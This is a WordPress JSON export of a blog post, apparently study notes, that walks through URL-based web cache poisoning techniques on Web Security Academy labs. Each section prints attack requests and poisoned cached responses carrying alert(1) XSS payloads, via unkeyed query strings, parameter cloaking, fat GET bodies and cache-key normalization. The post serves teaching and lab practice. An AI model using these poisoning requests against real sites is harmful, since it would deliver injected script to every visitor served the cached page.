{"id":1207,"date":"2023-02-08T00:09:00","date_gmt":"2023-02-07T16:09:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1207"},"modified":"2024-04-14T11:28:00","modified_gmt":"2024-04-14T03:28:00","slug":"web-cache-poisioning-url","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1207","title":{"rendered":"Web Cache Poisoning URL"},
"content":{"rendered":"<p>Most of a website's input comes from the URL and query string, but the request line is usually part of the cache key, so it is not normally usable for cache poisoning. Some cache systems, however, have quirks or flaws that make exactly these places usable for cache poisoning. The common URL-based cache poisoning techniques are the following:<\/p>\n\n<ul class=\"wp-block-list\">\n<li>unkeyed query string<\/li>\n<li>unkeyed query parameter<\/li>\n<li>Cache parameter cloaking<\/li>\n<li>fat GET request<\/li>\n<li>Normalized cache keys<\/li>\n<\/ul>\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n<h2 class=\"wp-block-heading\">unkeyed query string<\/h2>\n\n<p>On some websites the entire query string is excluded from the cache key. This can be exploited for cache poisoning, as in the following example.<\/p>\n\n<h3 class=\"wp-block-heading\">Observing normal behaviour<\/h3>\n\n<p>Suppose a normal request looks like the following; the response headers show that the target is served through a cache.<\/p>\n\n<pre class=\"wp-block-code\"><code>########### normal request ###########\nGET \/ HTTP\/1.1\n...omit...\n\n########### normal response ###########\nHTTP\/1.1 200 OK\n...omit...\nAge: 0\nX-Cache: miss\n...omit...\n&lt;link rel=\"canonical\" href='\/\/ac041f0f1ee0548280324f8300a3002d.web-security-academy.net\/'\/>\n...omit...<\/code><\/pre>\n\n<h3 class=\"wp-block-heading\">Testing for the vulnerability<\/h3>\n\n<p>Because the target is vulnerable, adding ?a=1 to the request's query string is enough to update the cached content. The response may at first look identical to the previous one; keep retrying until the cache period has expired.<\/p>\n\n<pre class=\"wp-block-code\"><code>GET \/?a=1 HTTP\/1.1\n...omit...<\/code><\/pre>\n\n<p>If you do not want to wait for the cache period to end before updating the cached content, use a cache buster, for example by adding Origin: test, as follows.<\/p>\n\n<pre class=\"wp-block-code\"><code>GET \/?a=1 HTTP\/1.1\nOrigin: test\n...omit...<\/code><\/pre>\n\n<p>After the cache has been updated, the response now contains <code>?a=1<\/code>, as follows.<\/p>\n\n<pre class=\"wp-block-code\"><code>HTTP\/1.1 200 OK\n...omit...\nAge: 0\nX-Cache: miss\n...omit...\n&lt;link rel=\"canonical\" href='\/\/ac041f0f1ee0548280324f8300a3002d.web-security-academy.net\/?a=1'\/>\n...omit...<\/code><\/pre>\n\n<p>Now, within the cache period, every request for <code>\/<\/code> returns the <code>\/?a=1<\/code> content that was just cached, as follows.<\/p>\n\n<pre class=\"wp-block-code\"><code>########### normal request ###########\nGET \/ HTTP\/1.1\n...omit...\n\n########### normal response ###########\nHTTP\/1.1 200 OK\n...omit...\nAge: 1\nX-Cache: hit\n...omit...\n&lt;link rel=\"canonical\" href='\/\/ac041f0f1ee0548280324f8300a3002d.web-security-academy.net\/?a=1'\/>\n...omit...<\/code><\/pre>\n\n<h3 class=\"wp-block-heading\">Attack request<\/h3>\n\n<p>So placing the attack payload in the request's URL query updates the cached content, and the response then contains the payload, as follows.<\/p>\n\n<pre class=\"wp-block-code\"><code>########### attack request ###########\nGET \/?evil='\/>&lt;script>alert(1)&lt;\/script> HTTP\/1.1\nOrigin: test\n...omit...\n\n########### attack response ###########\nHTTP\/1.1 200 OK\n...omit...\nAge: 0\nX-Cache: miss\n...omit...\n&lt;link rel=\"canonical\" href='\/\/ac041f0f1ee0548280324f8300a3002d.web-security-academy.net\/?evil='\/>&lt;script>alert(1)&lt;\/script>'\/>\n...omit...<\/code><\/pre>\n\n<p>Now, within the cache period, any request for <code>\/<\/code> still returns the attack URL query injected earlier.<\/p>\n\n<pre class=\"wp-block-code\"><code>########### attack request test ###########\nGET \/ HTTP\/1.1\nOrigin: test\n...omit...\n\n########### attack response test ###########\nHTTP\/1.1 200 OK\n...omit...\nAge: 2\nX-Cache: hit\n...omit...\n&lt;link rel=\"canonical\" href='\/\/ac041f0f1ee0548280324f8300a3002d.web-security-academy.net\/?evil='\/>&lt;script>alert(1)&lt;\/script>'\/>\n...omit...<\/code><\/pre>\n\n<p>Lab: Web cache poisoning via an unkeyed query string<\/p>\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n<h2 class=\"wp-block-heading\">unkeyed query parameter<\/h2>\n\n<p>Some websites exclude from the cache key only specific query parameters that are irrelevant to the back-end application, such as parameters used for analytics or targeted advertising.<\/p>\n\n<p>For example, on the following website the utm_content parameter can be used for a cache poisoning attack.<\/p>\n\n<pre class=\"wp-block-code\"><code>########### attack request ###########\nGET \/?utm_content='\/>&lt;script>alert(1)&lt;\/script>\n...omit...\n\n########### attack response ###########\n...omit...\nX-Cache: hit\n...omit...\n&lt;link rel=\"canonical\" href='\/\/ac6c1fcf1f88b0a8808b268c00bf0032.web-security-academy.net\/?utm_content='\/>&lt;script>alert(1)&lt;\/script>'\/>\n...omit...<\/code><\/pre>\n\n<p>Lab: Web cache poisoning via an unkeyed query parameter<\/p>\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n<h2 class=\"wp-block-heading\">Cache parameter cloaking<\/h2>\n\n<p>Any parsing discrepancy between the cache and the application can allow an arbitrary parameter to be hidden from the cache while still being used in the application logic.<\/p>\n\n<p>Suppose the cache key is <code>keyed_param<\/code> and the request is as follows.<\/p>\n\n<p><code>GET \/?keyed_param=abc&amp;excluded_param=123;keyed_param=bad-stuff-here<\/code><\/p>\n\n<p>Many caches treat this request as having two parameters:<\/p>\n\n<ul class=\"wp-block-list\">\n<li><code>keyed_param=abc<\/code><\/li>\n<li><code>excluded_param=123;keyed_param=bad-stuff-here<\/code><\/li>\n<\/ul>\n\n<p>But the back end, Ruby on Rails, sees the <code>;<\/code> and splits the query string into three separate parameters:<\/p>\n\n<ul class=\"wp-block-list\">\n<li><code>keyed_param=abc<\/code><\/li>\n<li><code>excluded_param=123<\/code><\/li>\n<li><code>keyed_param=bad-stuff-here<\/code><\/li>\n<\/ul>\n\n<p>When Ruby on Rails processes a repeated parameter, the second value wins, so <code>keyed_param=bad-stuff-here<\/code> takes effect while staying outside the cache key, and this can be exploited for cache poisoning.<\/p>\n\n<p>Taking another vulnerable website as an example, the following is a normal request.<\/p>\n\n<pre class=\"wp-block-code\"><code>########### normal request ###########\nGET \/js\/geolocate.js?callback=setCountryCookie HTTP\/1.1\n...omit...\n\n########### normal response ###########\nHTTP\/1.1 200 OK\nContent-Type: application\/javascript; charset=utf-8\nKeep-Alive: timeout=0\nCache-Control: max-age=35\nAge: 32\nX-Cache: hit\nConnection: close\nContent-Length: 201\n\nconst setCountryCookie = (country) => { document.cookie = 'country=' + country; };\nconst setLangCookie = (lang) => { document.cookie = 'lang=' + lang; };\nsetCountryCookie({\"country\":\"United Kingdom\"});<\/code><\/pre>\n\n<p>Analysis shows that the callback parameter controls the function name in the response, but that parameter is part of the cache key, so it cannot be used for cache poisoning directly. Looking further, three notable points emerge:<\/p>\n\n<ul class=\"wp-block-list\">\n<li>When the <code>callback<\/code> parameter is repeated, only the last one is reflected in the response<\/li>\n<li>The <code>utm_content<\/code> parameter is supported and is unkeyed<\/li>\n<li>If <code>;<\/code> is used to append another parameter to <code>utm_content<\/code>, the cache treats the whole thing as a single parameter, which is therefore also unkeyed<\/li>\n<\/ul>\n\n<p>Combining these three points, <code>;<\/code> can be used to append a second <code>callback<\/code> parameter to the <code>utm_content<\/code> parameter; it is not part of the cache key, yet it still overrides the function in the response, as follows.<\/p>\n\n<pre class=\"wp-block-code\"><code>######## request ########\nGET \/js\/geolocate.js?callback=setCountryCookie&amp;utm_content=foo;callback=arbitraryFunction\n\n######## response ########\nHTTP\/1.1 200 OK\nX-Cache-Key: \/js\/geolocate.js?callback=setCountryCookie\n\u2026\narbitraryFunction({\"country\" : \"United Kingdom\"})<\/code><\/pre>\n\n<p>Given these properties, placing the attack payload in the last callback parameter is enough to craft a cache poisoning attack, as follows.<\/p>\n\n<pre class=\"wp-block-code\"><code>######## attack request ########\nGET \/js\/geolocate.js?callback=setCountryCookie&amp;utm_content=foo;callback=alert(1) HTTP\/1.1\n...omit...\n\n######## attack response ########\nHTTP\/1.1 200 OK\nContent-Type: application\/javascript; charset=utf-8\nConnection: close\nCache-Control: max-age=35\nAge: 0\nX-Cache: miss\nContent-Length: 193\n\nconst setCountryCookie = (country) => { document.cookie = 'country=' + country; };\nconst setLangCookie = (lang) => { document.cookie = 'lang=' + lang; };\nalert(1)({\"country\":\"United Kingdom\"});<\/code><\/pre>\n\n<p>Now, within the cache period, every request for <code>GET \/js\/geolocate.js?callback=setCountryCookie<\/code> receives the poisoned cached response.<\/p>\n\n<p>Lab: Parameter cloaking<\/p>\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n<h2 class=\"wp-block-heading\">fat GET request<\/h2>\n\n<p>If the HTTP method is not part of the cache key, this technique may be possible: a second parameter with the same name is placed in the request body, as in the following example.<\/p>\n\n<p>Suppose the normal request is as follows.<\/p>\n\n<pre class=\"wp-block-code\"><code>######## normal request ########\nGET \/js\/geolocate.js?callback=setCountryCookie HTTP\/1.1\n...omit...\n\n######## normal response ########\nHTTP\/1.1 200 OK\nContent-Type: application\/javascript; charset=utf-8\nKeep-Alive: timeout=0\nCache-Control: max-age=35\nAge: 3\nX-Cache: hit\nConnection: close\nContent-Length: 201\n\nconst setCountryCookie = (country) => { document.cookie = 'country=' + country; };\nconst setLangCookie = (lang) => { document.cookie = 'lang=' + lang; };\nsetCountryCookie({\"country\":\"United Kingdom\"});<\/code><\/pre>\n\n<p>Because the website is vulnerable, placing a second callback in the request body makes the response reflect that second value, as follows.<\/p>\n\n<pre class=\"wp-block-code\"><code>######## attack request ########\nGET \/js\/geolocate.js?callback=setCountryCookie HTTP\/1.1\n...omit...\n\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">callback=alert(1)<\/mark>\n\n######## attack response ########\nHTTP\/1.1 200 OK\nContent-Type: application\/javascript; charset=utf-8\nConnection: close\nCache-Control: max-age=35\nAge: 0\nX-Cache: miss\nContent-Length: 197\n\nconst setCountryCookie = (country) => { document.cookie = 'country=' + country; };\nconst setLangCookie = (lang) => { document.cookie = 'lang=' + lang; };\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">alert(1)<\/mark>\n\n({\"country\":\"United Kingdom\"});<\/code><\/pre>\n\n<p>Once the cache is poisoned, any normal request within the cache period receives the poisoned cached response, as follows.<\/p>\n\n<pre class=\"wp-block-code\"><code>######## normal request ########\nGET \/js\/geolocate.js?callback=setCountryCookie HTTP\/1.1\n...omit...\n\n######## poisoned response ########\nHTTP\/1.1 200 OK\nContent-Type: application\/javascript; charset=utf-8\nConnection: close\nCache-Control: max-age=35\nAge: 2\nX-Cache: hit\nContent-Length: 197\n\nconst setCountryCookie = (country) => { document.cookie = 'country=' + country; };\nconst setLangCookie = (lang) => { document.cookie = 'lang=' + lang; };\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">alert(1)<\/mark>\n\n({\"country\":\"United Kingdom\"});<\/code><\/pre>\n\n<p>Lab: Web cache poisoning via a fat GET request<\/p>\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n<h2 class=\"wp-block-heading\">Normalized cache keys<\/h2>\n\n<p>If the attack code in the URL does not execute on its own, the cache can be used to make it execute.<\/p>\n\n<p>For example, requesting an arbitrary non-existent URL normally returns Not Found.<\/p>\n\n<pre class=\"wp-block-code\"><code>######## request ########\nGET \/random HTTP\/1.1\nHost: ac191f8c1f64ab9780f91953005800bb.web-security-academy.net\n...omit...\n\n######## response ########\nHTTP\/1.1 404 Not Found\nContent-Type: text\/html; charset=utf-8\nConnection: close\nCache-Control: max-age=10\nAge: 0\nX-Cache: miss\nX-XSS-Protection: 0\nContent-Length: 50\n\n&lt;p>Not Found: \/random&lt;\/p><\/code><\/pre>\n\n<p>If the target happens to be vulnerable, its cache can be poisoned by getting the XSS payload into the cache.<\/p>\n\n<pre class=\"wp-block-code\"><code>######## attack request ########\nGET \/random&lt;\/p>&lt;script>alert(1)&lt;\/script>&lt;p>foo HTTP\/1.1\nHost: ac191f8c1f64ab9780f91953005800bb.web-security-academy.net\n...omit...\n\n######## attack response ########\nHTTP\/1.1 404 Not Found\nContent-Type: text\/html; charset=utf-8\nConnection: close\nCache-Control: max-age=10\nAge: 0\nX-Cache: miss\nX-XSS-Protection: 0\nContent-Length: 60\n\n&lt;p>Not Found: \/random&lt;\/p>&lt;script>alert(1)&lt;\/script>&lt;p>foo&lt;\/p><\/code><\/pre>\n\n<p>In the attack URL above, <code>\/random&lt;\/p>&lt;script>alert(1)&lt;\/script>&lt;p>foo<\/code> gets URL-encoded, so the attack code does not execute on its own. When the response is served from the cache, however, this part is URL-decoded, so the cache can be used to execute the attack code.<\/p>\n\n<p>Once that URL is given to a victim, clicking it returns the cached content and the attack code is rendered.<\/p>\n\n<p>Lab: URL normalization<\/p>\n","protected":false},
"excerpt":{"rendered":"<p>Most of a website's input comes from the URL and query string, but the request line is usually part of the cache &#8230;<\/p>\n","protected":false},
"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard",
"meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},
"categories":[368],"tags":[],"class_list":["post-1207","post","type-post","status-publish","format-standard","hentry","category-operations"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,
"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1207","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1207"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1207\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1207"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1207"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1207"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}